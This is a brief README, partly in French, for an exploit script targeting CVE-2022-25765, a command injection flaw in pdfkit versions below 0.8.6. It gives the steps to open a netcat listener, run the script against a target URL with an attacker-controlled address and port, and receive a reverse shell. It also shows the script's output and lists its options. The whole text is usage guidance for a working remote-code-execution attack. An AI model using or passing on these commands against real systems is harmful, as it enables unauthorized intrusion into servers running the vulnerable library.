
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6
Exploit pour CVE-2022-25765 injection de commande dans pdfkit < 0.8.6
Voir plus de détails sur la vulnérabilité ici
Exécutez netcat sur votre hôte :
$ nc -lvnp 1337
Exécutez l'exploit (exemple) :
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
Options :
-t, --target Adresse de la cible au format http
-a, --addr Adresse pour la connexion inverse
-p, --port Port pour la connexion inverse, 9001 par défaut